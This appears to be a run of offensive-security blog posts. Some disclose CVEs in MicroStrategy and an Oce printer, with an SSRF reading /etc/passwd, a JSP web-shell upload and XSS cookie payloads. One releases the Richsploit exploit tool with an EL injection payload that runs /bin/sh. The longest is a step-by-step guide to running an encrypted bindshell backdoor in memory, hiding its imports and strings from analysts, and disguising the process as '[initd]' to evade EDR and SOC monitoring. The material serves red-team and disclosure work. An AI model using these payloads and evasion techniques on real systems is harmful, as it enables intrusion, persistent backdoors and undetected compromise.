Blog

Another SSRF, Another RCE – The Microstrategy case

If you are passionate about music and especially historical rock bands, the post’s title could have rung a bell on you. It is indeed the parody of the famous song “Another Girl, Another Planet“. It may be that you know it because of the Blink 182 cover song more than for the original piece sung by “The Only Ones” band. Anyway, the focal point of the title is that, regardless the pun, there are so many documented cases out there where a SSRF bug has led straight to execution of remote code that should not come as a surprise if today we are going to add another one over the table.

Overview

What reported here is the output of a web application penetration test we quickly conducted early last autumn on Microstrategy Intelligence Server & Web, that brought us to discover six different vulnerabilities and recently to register a total of five CVE(s). Until now these vulnerabilities have been unknown to the public.

Microstrategy Intelligence Server & Web

MicroStrategy Intelligence Server (also dubbed iserver) is an analytical server optimized for enterprise querying, reporting, and OLAP analysis. A front-end component, called MicroStrategy Web, connects to iserver and provides users with an interface for reporting and analysis.

The application includes a functionality allowing users to import files or data from external resources such as URLs or databases. Of particular interest is the “File From URL” option. This sounds like a feature that would be typically vulnerable to SSRF (Server Side Request Forgery). Let’s check it.

We first create the file “pwned.txt” with random content and host it somewhere over the internet:

$ cat pwned.txt
You are Pwn3d!

Now, what if an external URL under the attacker’s control referencing that file (for example “http://attacker_ip:8080/pwned.txt”) is typed into the “Upload your files” textbox as shown below?

What happens with Microstrategy 10.4 (and potentially above) is that the application downloads the file’s content from the attacker-controlled machine…

…then parses and prints it into the dashboard area.

Ehi, but wait! If we carefully take a look at the first screenshot coming with this blog post, a label over the “File From URL” option is explicitly stating that the usage of “file://” scheme is allowed too. How would the application react if we provided the string “file:///etc/passwd” instead of a URL? The picture below clearly answers this question.

Well we have officially a SSRF (registered as CVE-2020-11452) that an attacker can take profit of to retrieve arbitrary files from the local system where the Microstrategy solution is installed. This is great: we can get the content of files whose path is well-known (for example OS configuration files) or proceeding by trial and error approach if unknown. However, it would be even better if we could at least identity the full path of the application server (or servlet container) where the application is hosted and continue the analysis from that angle.

Here is where a second vulnerability comes in. Browsing to the URL “/MicroStrategyWS/happyaxis.jsp”, as an unauthenticated user, we can obtain some basic information such as the JVM version in use, the CPU architecture and the installation folder of the application server or servlet container (tomcat in our case).

With RedTimmy Security we have registered this information disclosure bug as well and MITRE assigned to it the CVE-2020-11450.

Needless to say, once the base configuration folder of Tomcat is known, more paths and information about the deployed applications can be obtained from “server.xml”, “web.xml”, tomcat log files, etc… So it should not come as a surprise if after obtaining these resources through the SSRF and carefully analyzed them, we ended up to exfiltrate private keys and passwords, sometimes obfuscated, sometimes in clear-text (by the way, how to de-obfuscate passwords in Tomcat is a good story for another blog post).

By analyzing the tomcat configuration files, we also learnt that Microstrategy comes with an administration console reachable from “https://hostname/MicroStrategy/servlet/admin”. Eventually one of the passwords previously retrieved has worked against the admin panel, which has open us the door to the exploitation of the most boring RCE vulnerability ever.

CVE-2020-11451

Once logged into the Microstrategy admin panel, the “Upload Visualization”plugin accessible from the “Custom Visualizations” link (see image above), allows a global administrator to upload a zip archive containing files with arbitrary extensions and data.

Why don’t we upload a zip archive containing a malicious JSP web shell? We have used for the purpose something similar to this and renamed it as “admin.jsp”. The bottom line is that regardless what is put inside the zip archive, these file(s) are then extracted to the publicly accessible URL “/MicroStrategy/plugins/<FILENAME>”.

All we need to do now is just pointing the browser to the resource “https://hostname/MicroStrategy/plugins/admin.jsp” to invoke the web shell and execute arbitrary OS commands with the privileges of the Tomcat user.

Other CVE(s).

During our assessment we have discovered more bugs.

CVE-2020-11453 is another Server-Side Request Forgery in the “Test Web Service” functionality exposed through the path “/MicroStrategyWS/”. The functionality requires no authentication and, while it is not possible to pass arbitrary schemes in the SSRF request, it could still be possible to exploit it in order to conduct port scanning.

Specifically the attacker browses the URL “https://hostname/MicroStrategyWS/” and passes an arbitrary IP address/hostname and port number into the “Intelligence Server” and “Port Number” textboxes.

CVE-2020-11454 is instead a Stored Cross-Site Scripting vulnerability affecting the “HTML Container” and “Insert Text” functionalities in the window allowing for the creation of a new dashboard. The application allows to insert new text lines inside a created dashboard or opening a ready one. Basically it is possible to change its type from “iframe” to “HTML Text” right-clicking on it and selecting “Properties and Formatting”.

The HTML code injected will be evaluated every time the dashboard is loaded.

That’s all for today. If you want to learn more in-depth webapp hacking techniques, remember to join us at Blackhat Las Vegas this year with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August! We look forward to see you there!

Also, why don’t you follow us on twitter? https://twitter.com/redtimmysec

Hacking the Oce Colorwave printer: when a quick security assessment determines the success of a Red Team exercise.

Back in September 2019, as Red Timmy Security group, we have been involved in a Red Team exercise. We had to simulate the scenario of a malicious insider plugging a Raspberry Pi device in to the network to potentially use as a C&C, and to check how much time the guys monitoring the environment would have spent to detect it. Furthermore, the place where to hide our device had to be tricky enough to spot, with the aim to pour a pinch of extra pepper on the challenge against the blue team.

Consequently, we did not want simply to drop the device at the first location available, raising suspicions on other employees who were unaware of our real role and increasing the risk to be caught. Therefore the initial couple of days following the job engagement we behaved normally: we have been assigned a company laptop, a badge and completed all the on-boarding tasks, which are typical of when somebody is hired for real. Oh well, almost. The second day, after opening the browser of our new shining company laptop, we mistakenly typed in the number “1” in the URL bar, and discovered that some IP addresses were already visited in the chronology.

We selected the first URL in the list (a local IP address) and visited that. It was the web interface of the Océ Colorwave 500 printer, a big boy weighting more than 250 kilograms (see picture below).

Why should not we give a quick look at it? I guess you know how it went. We did a mini assessment of the printer that lasted a couple of hours. That was enough to discover five different flaws. However, for the matter of this story, only one was relevant. We provide the details of the rest at the end of this post.

Basically we discovered that the Oce Colorwave 500 printer was vulnerable to an authentication bypass bug on the page “http://<printer-IP>/home.jsp”. When that page is browsed by an anonymous (unauthenticated) user clicking on the “View All” button with the intention to visualize the current job queue, the application returns a login panel asking for administrative credentials.

However it was sufficient to append the parameter “openSI=[SI]” to the “home.jsp” page (with “[SI]” being the name of a network user) to view the printer inbox of that user and all the relative print jobs, so completely skipping the authentication process.

Currently the name of the network user we wanted to spy the inbox of was nothing more than its Windows active directory username. The convention used internally by the target company was easy enough to understand (a combination of the user first name and surname, and of course AD was “publicly queryable”), that was really a joke to script an automated process collecting all the printed documents from the device’s queue for subsequent manual analysis.

We did not need to poll the device frequently, just once per user, as the queue of the printed jobs was configured (a default setting of the printer we guess) so to be shred only every 2 weeks. This would have given us enough time to download everything submitted to the printer by anyone in the company that had used it in the last 14 days. After finishing the task, we started to manually analyze all the documents collected. A tedious but rewarding task at the end!

We were indeed lucky enough to find the blueprints/security plants of the customer building, including the space hosting us. At the beginning everything was quite tough to read as the blueprints were full of meaningless labels and symbols. But in the middle of the set of documents exfiltrated from the printer spool was also found a legend with the description of each symbol. Something similar to this:

After taking confidence with it, we knew the exact dislocation of desks, security cameras, conference rooms, security equipment including card readers, local alarms / sounders, electromagnetic locks, intercoms, patch panels, network cables, etc… in the building!

It was the turning point of our exercise. The place we found for our Raspberry Pi device and what happened later is another story.

Most importantly, soon after the closure of the red team operation, the e-shredding functionality has been activated and applied for all print-jobs and the device immediately isolated from the network, put behind a firewall in a separate VLAN.

We have contacted the vendor of course and communicated our findings. After few days the vendor has replied informing us of the existence of a newer firmware version compared to the one running on the printer tested by us (that was 4.0.0.0). As no CVEs have been registered for these bugs in the past, we have decided to do that.

In total we have registered five CVE(s). All these bugs (two Reflected XSS, one Stored XSS and a systemic CSRF), including the authentication bypass already described (CVE-2020-10669), have been discovered by Giuseppe Calì with the contribute of Marco Ortisi. Below you can find the additional details for each of them.

CVE-2020-10667

The web application exposed by the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Stored XSS in “/TemplateManager/indexExternalLocation.jsp”. The vulnerable parameter is “map(template_name)”.

An external location is first created by browsing the URL “http://<printer-IP>/TemplateManager/editTemplate.jsp?type=ExternalLocation”. Here the “Name” parameter (actually the “map(template_name)” parameter in the POST request generated after clicking the “Ok” button) is injected with the following sample JavaScript payload:

“<script>alert(document.cookie);</script>

After creating the external location template, any attempts to edit it will trigger the sample payload.

CVE-2020-10668

The web application exposed by the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Reflected XSS in “/home.jsp”. The vulnerable parameter is “openSI”. Browsing the URL:

http://<printer-IP>/home.jsp?openSI=</script><script>alert(document.cookie);</script>

an alert box will pop-up in the page, showing that the attacker’s payload has been executed in the context of the user’s browser session.

CVE-2020-10670

The web application exposed by the Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Reflected Cross-Site Scripting in “/SettingsEditor/settingDialogContent.jsp. The vulnerable parameter is “settingId”. Browsing the URL:

http://<printer-IP>/SettingsEditor/settingDialogContent.jsp?settingId=<img src=x onerror=”alert(document.domain);”/>

An alert box will pop-up in the page, showing that the attacker’s payload has been executed in the context of the user’s browser session.

CVE-2020-10671

The web application of the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is missing any form of CSRF protections. This is a system-wide issue. An attacker could perform administrative actions by targeting a logged-in administrative user.

That’all for today. As usual we remind you that we will be at Blackhat Las Vegas with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August 2020.

Richsploit: One tool to exploit all versions of RichFaces ever released

We are proud to release Richsploit, a tool we wrote to exploit multiple versions of RichFaces. This infamous Java library is included with many JSF web applications for providing advanced UI elements beyond the (very limited) set that is built-in with the framework. Therefore, many websites using JSF are vulnerable to exploitation.

How to detect RichFaces

When a website is using RichFaces, it will load resources from specific URLs which you can see when you monitor outgoing requests with tools like Burp or within the browser’s development tools.

  • Richfaces 3.x: http://example.com/app_name/a4j/g/..
  • Richfaces 4.x: http://example.com/app_name/rfRes/org.richfaces…

Tools like Wappalyzer can be used as well.

Vulnerable versions

All versions of RichFaces ever released are vulnerable to at least one exploit. See below an overview of which version is vulnerable to which exploit:

RichFaces 3
3.1.0 ≤ 3.3.3 CVE-2013-2165
3.1.0 ≤ 3.3.4 CVE-2018-12533
3.1.0 ≤ 3.3.4 CVE-2018-14667
RichFaces 4
4.0.0 ≤ 4.3.2 CVE-2013-2165
4.0.0 ≤ 4.5.4 CVE-2015-0279
4.5.3 ≤ 4.5.17 CVE-2018-12532

Exploits

What follows is a brief overview of how each vulnerability works and can be exploited. For more background information, I will refer to some external articles which describe the technicalities in more details.

CVE-2013-2165

This vulnerability was the first one identified on RichFaces, and affects both version 3.x and 4.x. It’s a classic deserialization vulnerability, which allows deserialization of arbitrary Java serialized object streams. To exploit it, the application has to be linked with vulnerable libraries in the classpath, to be able to build a gadget chain.

Because there is no lookahead implemented, every class on the classpath is a potential candidate. One example would be the Apache Commons class, which is often linked with JSF applications.

You can prepare a payload with a tool like ysoserial, save it to a file, and fetch it to Richsploit via the “-p” parameter.

More information: https://codewhitesec.blogspot.com/2018/05/poor-richfaces.html

CVE-2015-0279

This second vulnerability is harder to exploit, but potentially more rewarding. It’s an EL injection vulnerability, that can lead to remote code execution. The idea is to send a proper serialized object this time, but inside the object we put malicious EL code.

EL stands for Expression Language, which is a limited form of Java, used to attach small pieces of logic to UI listeners (e.g. clicking a button would invoke a function call). Even though the capabilities are very limited, we can use a series of tricks to achieve remote code execution.

Richsploit will inject the following EL string when executed: #{"".getClass().forName("java.lang.ProcessBuilder").getConstructors()[1].newInstance("/bin/sh~-c~"+COMMAND+".split("~")).start()}

Let’s take a step-by-step look at how this works.

Expression Language restricts us to a one liner, and we can only start with a variable which is in EL scope:

  • Lambda parameters
  • Literals
  • Managed beans
  • Implicit objects
  • Variables defined in the xhtml

In our example, we start with an empty string, which is a literal

Now we need a way to transfer from a String class to a ProcessBuilder class. We do that by first transforming to the generic Class<> type. Class is an object in Java that represents a Java class. It has methods like getConstructor(), getMethod(), etc.

From there we transform our object to a ProcessBuilder type, using the forName() function from Class. We use ProcessBuilder instead of the more famous Runtime, because

  • ProcessBuilder allows to set the command via the constructor
  • Runtime needs a call to Runtime.getRuntime() but static calls are not allowed in EL (yet another restriction)

To use this class, we have to instantiate it. The getConstructors() function returns an array of all constructors of the class. Unfortunately the order of them appearing in the array changes each time the application is launched. Therefore, this method could require some trial and error, until it is at index 1.

Luckily, ProcessBuilder only has two constructors, so we have a 50% chance of success.

Java doesn’t allow you to create a static array, so we use the split function to transform the String to a String[].

Finally, the start() function is required by ProcessBuilder to invoke execution.

More information: https://issues.redhat.com/browse/RF-13977

CVE-2018-12532

This vulnerability is a response on the fix of the previous one (CVE-2015-0279). As the patch to CVE-2015-0279 (introduced in 4.5.4) disallowed the use of parenthesis in the EL method expression of the contentProducer, it seemed like a dead end.

But if you are fimilar with EL internals, you would know that they can have custom function mappers and variable mappers, which are used by the ELResolver to resolve functions (i. e., name in ${prefix:name()}) and variables (i. e., var in ${var.property}) to Method and ValueExpression instances respectively. Fortunately, various VariableMapper implementations were added to the whitelist (since version 4.5.3).

So to exploit this, all that is needed is to use a variable in the contentProducer method expression like ${dummy.toString} and add an appropriate VariableMapper to the method expression that maps dummy to a ValueExpression, containing the EL we want to inject (same as with CVE-2015-0279).

CVE-2018-12533

This CVE is similar to the CVE-2015-0279, but it uses a different class. Instead of org.resource.MediaResourceOutput, it is using org.richfaces.renderkit.html.Paint2DResource$ImageData.

The trick is that ImageData extends org.ajax4jsf.resource.SerializableResource, which is in the whitelist that was introduced in 3.3.4 to fix the Java deserialization vulnerability (CVE-2013-2165).

More information: https://codewhitesec.blogspot.com/2018/05/poor-richfaces.html

CVE-2018-14667

This final CVE is the most elaborate one and requires some extra detailed explanation because there are no other write-ups available on the internet except this slideshare.

It’s again an EL injection, similar to CVE-2015-0279. The general idea is as follows:

  1. Visit a page that contains <a4j:mediaOutput> tag. This will register UserResource for the session
  2. Prepare serialized payload, containing the EL injection string
  3. Visit UserResource URL and attach encoded serialized payload object in URL after /DATA/
  4. The UserResource class will be instantiated with data from the payload, leading to EL execution

To see this in more detail, this is the call chain from step 3:

/richfaces-demo-jsf2-3.3.3.Final-tomcat6/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/s/-1487394660/DATA/eAFtUD1LAzEYfi0WP6q[...]zrk29wt4uKHd.jsf

When this URL is provided, the filter defined in web.xml sends it to BaseFilter, which will send it to:

InternetResourceService.java:
The getResourceDataForKey() function reads the /DATA/ object and returns it as Java Object.
Object resourceDataForKey = getResourceBuilder().getResourceDataForKey(resourceKey);

InternetResourceService.java:
It is then saved in resourceContext
resourceContext.setResourceData(resourceDataForKey);

InternetResourceService.java:
The ResourceLifeCycle.send() method is called, which will call sendResource()
getLifecycle().send(resourceContext, resource);

ResourceLifeCycle.java:
Here, the send() method is called DIRECTLY ON THE RESOURCE. So this roughly translates to UserResource.send(context_containing_el)
resource.send(resourceContext);

This is the send function of the vulnerable class UserResource.java of which I provide the code here:

 public void send(ResourceContext context) throws IOException {
   UriData data = (UriData) restoreData(context);
   FacesContext facesContext = FacesContext.getCurrentInstance();
   if (null != data && null != facesContext ) {
     // Send headers
     ELContext elContext = facesContext.getELContext();
     // Send content
     OutputStream out = context.getOutputStream();
     MethodExpression send = (MethodExpression)       
     UIComponentBase.restoreAttachedState(facesContext,data.createContent);
     send.invoke(elContext,new Object[]{out,data.value});
   }
 }

The send.invoke() will execute the EL coming from the context.
So the only way to reach this vulnerable method is by supplying UserResource as the resource in the URL, otherwise resource.send() will never lead to the send() method of UserResource.

Now for the payload, the object we supply is in the ‘context’ variable. It will need to survive:

  • restoreData(context)
  • A cast to UriData
  • A dereference to .createContent, which has to contain a MethodExpression

This means the gadget chain looks as follows:

org.ajax4jsf.resource.UserResource.UriData 
createContent:
javax.faces.component.StateHolderSaver
savedState:
org.jboss.el.MethodExpressionImpl
exp: "${Expression Language}"

See the source code of Richsploit for how this particular serialized object is created. Some tricks with reflection are required because UriData has private fields, and there would have been no way to set the value of createContent directly.

Download

Richsploit can be found on our GitHub page. And remember to join us at Blackhat Las Vegas this year with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August!

Blue Team vs Red Team: how to run your encrypted ELF binary in memory and go undetected

Imagine finding yourself in a “hostile” environment, one where you can’t run exploits, tools and applications without worrying about prying eyes spying on you, be they a legitimate system administrator, a colleague sharing an access with you or a software solution that scans the machine you are logged in to for malicious files. Your binary should live in encrypted form in the filesystem so that no static analysis would be possible even if identified and copied somewhere else. It should be only decrypted on the fly in memory when executed, so preventing dynamic analysis too, unless the decryption key is known.

How to implement that?

On paper everything looks fine, but practically how do we implement this? With Red Timmy Security we have created the “golden frieza” project, a collection of several techniques to support on-the-fly encryption/decryption of binaries. Even though we are not ready yet to release the full project, we are going to discuss in depth one of the methods it implements, accompanied by some supporting source code.

Why is the discussion relevant both to security analysts working at SOC departments, Threat Intelligence and Red Teams? Think about a typical Red Team operation, in which tools that commonly trigger security alerts to SOC, such as “procmon” or “mimikatz”, are uploaded in a compromised machine and then launched without having the installed endpoint protection solutions or the EDR agents complaining about that. Alternatively, think about a zero-day privilege escalation exploit that an attacker wants to run locally in a just hacked system, but they don’t want it to be reverse engineered while stored in the filesystem and consequently divulged to the rest of the world.

This is exactly the kind of techniques we are going to talk about.

A short premise before to get started. All the examples and code released (github link) work with ELF binaries. Conceptually there is nothing preventing you from implementing the same techniques with Windows PE binaries, of course with the opportune adjustments.

What to encrypt?

An ELF binary file is composed of multiple sections. We are mostly interested to encrypt the “.text” section where are located the instructions that the CPU executes when the interpreter maps the binary in memory and transfers the execution control over it. To put it simple, the section “.text” contains the logic of our application that we do not want to be reverse-engineered.

Which crypto algorithm to use?

To encrypt the “.text” section we will avoid block ciphers, which would force the binary instructions into that section to be aligned to the block size. A stream cipher algorithm fits perfectly in this case, because the length of the ciphertext produced in output will be equal to the plaintext, hence there are not padding or alignment requirements to satisfy. We choose RC4 as encryption algorithm. The discussion of its security is beyond the scope of this blog post. You might implement whatever else you like in replacement.

The implementation

The technique to-be implemented must be as easy as possible. We want to avoid manual memory mappings and symbol relocations. For example, our solution could rely on two components:

  • An ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • the launcher, a program that takes as an input the ELF dynamic library, decrypting it in memory by means of a crypto key and then executing it.

What is not clear yet is what we should encrypt: the full “.text” section or just the malicious functions exported in the ELF module? Let’s try to put in practice an experiment. The following source code exports a function called “testalo()” taking no parameter. After compilation we want it to be decrypted only once it is loaded in memory.

We compile the code as a dynamic library:

$ gcc testalo_mod.c -o testalo_mod.so -shared -fPIC

Now let’s have a look at its sections with “readelf”:

The “.text” section in the present case starts at file offset 0x580 (1408 bytes from the beginning of testalo_mod.so) and its size is 0x100 (256 bytes). What if we fill up this space with zeros and then try to programmatically load the library? Will it be mapped in our process memory or the interpreter will have something to complain about? As the encryption procedure creates garbage binary instructions, filling up the “.text” section of our module with zeros actually simulates that without trying your hand at encrypting the binary. We can do that by executing the command:

$ dd if=/dev/zero of=testalo_mod.so seek=1408 bs=1 count=256 conv=notrunc

…and then verifying with “xxd” that the “.text” section has been indeed entirely zeroed:

$ xxd testalo_mod.so
[...]
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]

To spot the final behavior that we are attemping to observe, we need an application (see code snippet of “dlopen_test.c” below) that tries to map the “testalo_mod.so” module into its address space (line 12) and then, in case of success, checks if at runtime the function “testalo()” gets resolved (line 18) and executed (line 23).

Let’s compile and execute it:

$ gcc dlopen_test -o dlopen_test -ldl
$ ./dlopen_test
Segmentation fault (core dumped)

What we are observing here is that during the execution of line 12 the program crashes. Why? This happens because, even if the call to “dlopen()” in our application is not explicitly invoking anything from “testalo_mod.so”, there are functions into “testalo_mod.so” itself that are instead automatically called (such as “frame_dummy()”) during the module initialization process. A “gdb” session will help here.

$ objdump -M intel -d testalo_mod.so

Because such functions are all zeroed, this produces a segmentation fault when the execution flow is transferred over those.

What if we only encrypted the content of the “testalo()” function on which our logic resides? To do that we just recompile “testalo_mod.so” and determine the size of the function’s code with the command “objdump -M intel -d testalo_mod.so“, by observing where the function starts and where it ends :

The formula to calculate our value is 0x6800x65a = 0x26 = 38 bytes.

Finally we overwrite the library “testalo_mod.so” with 38 bytes of zeros, starting from where the “testalo()” function locates, which this time is offset 0x65a = 1626 bytes from the beginning of the file:

$ dd if=/dev/zero of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc

Then we can launch “dlopen_test” again:

$ ./dlopen_test
Segmentation fault (core dumped)

It seems nothing has changed. But a closer look will reveal the segfault has occurred for another reason this time:

Previously we have got stuck at line 12 in “dlopen_test.c”, during the initialization of the “testalo_mod.so” dynamic library. Now instead we get stuck at line 23, when “testalo_mod.so” has been properly mapped in our process memory, the “testalo()” symbol has been already resolved from it (line 18) and the function is finally invoked (line 23), which in turn causes the crash. Of course, the binary instructions are invalid because before we have zeroed that block of memory. However if we really had put encrypted instructions there and decrypted all before the invocation of “testalo()“,  everything would have worked smoothly.

So, we know now what to encrypt and how to encrypt it: only the exported functions holding our malicious payload or application logic, not the whole text section.

Next step: a first prototype for the project

Let’s see a practical example of how to decrypt in memory our encrypted payload. We said at the beginning that two components are needed in our implementation:

  • (a) an ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • (b) the launcher, a program that takes as an input the ELF dynamic library, decrypting it in memory by means of a crypto key and then executing it.

Regarding the point (a) we will continue to utilize “testalo_mod.so” for now by encrypting the “testalo()” function’s content only. Instead of using a specific program for that, just take profit of existing tools such as “dd” and “openssl”:

$ dd if=./testalo_mod.so of=./text_section.txt skip=1626 bs=1 count=38

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad

$ dd if=./text_section.enc of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc

The first command basically extracts 38 bytes composing the binary instructions of “testalo()”. The second command encrypt these with the RC4 key “AAAAAAAAAAAAAAAA” (hex representation -> “41414141414141414141414141414141”) and the third command write back the encrypted content to the place where “testalo()” is located into the binary. If we observe the code of that function now with the command “objdump -M intel -d ./testalo_mod.so“, it will be unintelligible indeed:

The second needed component is the launcher (b). Let’s analyze its C code piece by piece. First it acquires in hexadecimal format the offset where our encrypted function is mapped (information that we retrieve with “readelf”) and its length in byte (line 102). Then the terminal echo is disabled (lines 116-125) in order to permit the user to type in safely the crypto key (line 128) and finally the terminal is restored back to the original state (lines 131-135).

Now we have the offset where our encrypted function is in memory but we do not know yet the full memory address where it is mapped. This is determined by looking at “/proc/PID/maps” as in the code snippet down.

Then all the pieces are settled to extract from the memory the encrypted binary instructions (line 199), decrypt everything with the RC4 key collected previously and write the output back to the location where “testalo()” function’s content lives (line 213). However, we could not do that without before marking that page of memory to be writable (lines 206-210) and then back again readable/executable only (lines 218-222) after the decrypted payload is written into it. This is because in order to protect the executable code against tampering at runtime, the interpreter loads it into a not writable memory region. After usage, the crypto key is also wiped out from memory (line 214).

Now the address of the decrypted “testalo()” function can be resolved (line 228) and the binary instructions it contains be executed (line 234).

This first version of the launcher’s source code is downloadable from here. Let’s compile it…

$ gcc golden_frieza_launcher_v1.c -o golden_frieza_launcher_v1 -ldl

…execute it, and see how it works (in bold the user input):

$ ./golden_frieza_launcher_v1 ./testalo_mod.so
Enter offset and len in hex (0xXX): 0x65a 0x26
Offset is 1626 bytes
Len is 38 bytes
Enter key: <-- key is inserted here but not echoed back
PID is: 28527
Module name is: testalo_mod.so
7feb51c56000-7feb51c57000 r-xp 00000000 fd:01 7602195 /tmp/testalo_mod.so
Start address is: 0x7feb51c56000
End address is 0x7feb51c57000

Execution of .text
==================
Sucalo Sucalo oh oh!
oh oh Sucalo Sucalo!!

As shown at the end of the command output, the in-memory decrypted content of the “testalo()” function is indeed successfully executed.

But…

What is the problem with this approach? It is that even though our library would be stripped, the symbols of the functions invoked by “testalo()” (such as “puts()” and “exit()”) that need to be resolved and relocated at runtime, remain well visible. In case the binary finishes in the hands of a system administrator or SOC analyst, even with the “.text” section encrypted in the filesystem, through simple static analysis tools such as “objdump” and “readelf” they could inference what is the purpose of our malicious binary.

Let’s see it with a more concrete example. Instead of using a dummy library, we decide to implement a bindshell (see the code here) and compile that code as an ELF module:

$ gcc testalo_bindshell.c –o testalo_bindshell.so –shared -fPIC

We strip the binary with the “strip” command and encrypt the relevant “.text” portion as already explained before. If now we look at symbols table (“readelf –s testalo_bindshell.so”) or relocations table (“readelf –r testalo_bindshell.so”) something very similar to the picture below appears:

This clearly reveals the usage of API such as “bind()”, “listen()”, “accept()”, “execl()”, etc… which are all functions that typically a bindshell implementation imports. This is inconvenient in our case because reveals the nature of our code. We need to get a workaround.

dlopen and dlsyms

To get around the problem, the approach we adopt is to resolve external symbols at runtime through “dlopen()” and “dlsyms()”.

For example, normally a snippet of code involving a call to “socket()” would look like this:

#include
[...]
if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)
[...]

When the binary is compiled and linked, the piece of code above is responsible for the creation of an entry about “socket()” in the dynamic symbols and relocations tables. As already said, we want to avoid such a condition. Therefore the piece of code above must be changed as follows:

Here “dlopen()” is invoked only once and “dlsyms()” is called for any external functions that must be resolved. In practice:

  • int (*_socket)(int, int, int);” -> we define a function pointer variable having the same prototype as the original “socket()” function.
  • handle = dlopen (NULL, RTLD_LAZY);” -> “if the first parameter is NULL the returned handle is for the main program”, as stated in the linux man page.
  • _socket = dlsym(handle, "socket");” -> the variable “_socket” will contain the address of the “socket()” function resolved at runtime with “dlsym()”.
  • (*_socket)(PF_INET, SOCK_STREAM, 0)” -> we use it as an equivalent form of “socket(PF_INET, SOCK_STREAM, 0)”. Basically the value pointed to by the variable “_socket” is the address of the “socket()” function that has been resolved with “dlsym()”.

These modifications must be repeated for all the external functions “bind()”, “listen()”, “accept()”, “execl()”, etc…

You can see the differences between the two coding styles by comparing the UNMODIFIED BINDSHELL LIBRARY and the MODIFIED ONE. After that the new library is compiled:

$ gcc testalo_bindshell_mod.c -shared -o testalo_bindshell_mod.so -fPIC

…the main effects tied to the change of coding style are the following:

In practice the only external symbols that remain visible now are “dlopen()” and “dlsyms()”. No usage of any other socket API or functions can be inferenced.

Is this enough?

This approach has some issues too. To understand that, let’s have a look at the read-only data section in the ELF dynamic library:

What’s going on? In practice, all the strings we have declared in our bindshell module are finished in clear-text inside the “.rodata” section (starting at offset 0xaf5 and ending at offset 0xbb5) which contains all the constant values declared in the C program! Why is this happening? It depends on the way how we pass string parameters to the external functions:

_socket = dlsym(handle, "socket");

What we can do to get around the issue is to encrypt the “.rodata” section as well, and decrypt it on-the-fly in memory when needed, as we have already done with the binary instructions in the “.text” section. The new version of the launcher component (golden_frieza_launcher_v2) can be downloaded here and compiled with “gcc golden_frieza_launcher_v2.c -o golden_frieza_launcher_v2 -ldl”. Let’s see how it works. First the “.text” section of our bindshell module is encrypted:

$ dd if=./testalo_bindshell_mod.so of=./text_section.txt skip=1738 bs=1 count=1055

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc –nopad

$ dd if=./text_section.enc of=./testalo_bindshell_mod.so seek=1738 bs=1 count=1055 conv=notrunc

Same thing for the “.rodata” section:

$ dd if=./testalo_bindshell_mod.so of=./rodata_section.txt skip=2805 bs=1 count=193

$ openssl rc4 -e -K 41414141414141414141414141414141 -in rodata_section.txt -out rodata_section.enc -nopad

$ dd if=./rodata_section.enc of=./testalo_bindshell_mod.so seek=2805 bs=1 count=193 conv=notrunc

Then the launcher is executed. It takes the bindshell module filename (now both with encrypted “.text” and “.rodata” sections) as a parameter:

$ ./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so

The “.text” section offset and length is passed as hex values (we have already seen how to get those):

Enter .text offset and len in hex (0xXX): 0x6ca 0x41f
Offset is 1738 bytes
Len is 1055 bytes

Next the “.rodata” section offset and length is passed too as hex values. As seen in the last “readelf” screenshot above, in this case the section starts at 0xaf5 and the len is calculated like this: 0xbb50xaf5 + 1 = 0xc1:

Enter .rodata offset and len in hex (0xXX): 0xaf5 0xc1
.rodata offset is 2805 bytes
.rodata len is 193 bytes

Then the launcher asks for a command line parameter. Indeed our bindshell module (specifically the exported  “testalo()” function) takes as an input parameter the TCP port it has to listen to. We choose 9000 for this example:

Enter cmdline: 9000
Cmdline is: 9000

The encryption key (“AAAAAAAAAAAAAAAA”) is now inserted without being echoed back:

Enter key:

The final part of the output is:

PID is: 3915
Module name is: testalo_bindshell_mod.so
7f5d0942f000-7f5d09430000 r-xp 00000000 fd:01 7602214 /tmp/testalo_bindshell_mod.so
Start address is: 0x7f5d0942f000
End address is 0x7f5d09430000

Execution of .text
==================

This time below the “Execution of .text” message we get nothing. This is due to the behavior of our bindshell that does not print anything to the standard output. However, the bindshell backdoor has been launched properly in the background:

$ netstat -an | grep 9000
tcp 0 0 0.0.0.0:9000 0.0.0.0:* LISTEN

$ telnet localhost 9000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1000(cippalippa) gid=1000(cippalippa_group)

Last old-school trick of the day

A valuable point is: how is the process shown in the process list after the bindshell backdoor is executed?

$ ps -wuax
[...]
./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so
[...]

Unfortunately the system owner could identify the process as malicious on first glance! This is not normally an issue in case our code runs for a narrowed amount of time. But what in case we want to plant a backdoor or C&C agent for a longer period of time? In that case it would be convenient to mask the process somehow. It is exactly what the piece of code below (implemented in complete form here) does.

Let’s first compile the new version of the launcher binary:

$ gcc golden_frieza_launcher_v3.c -o golden_frieza_launcher_v3 -ldl

This time the launcher takes an additional parameter beyond the encrypted dynamic library filename, which is the name we want to assign to the process. In the example below “[initd]” is used:

$ ./golden_frieza_launcher_v3 ./testalo_bindshell_mod.so "[initd]"

Indeed by means of “netstat” we can spot the PID of the process (assuming the bindshell backdoor has started on TCP port 9876):

